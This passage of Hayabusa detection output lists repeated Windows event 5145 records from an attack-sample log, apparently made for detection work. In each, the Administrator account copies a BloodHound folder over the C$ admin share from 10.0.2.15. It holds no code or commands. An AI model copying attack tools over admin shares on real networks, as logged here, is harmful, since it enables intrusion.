Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.798 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.808 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.808 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.808 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 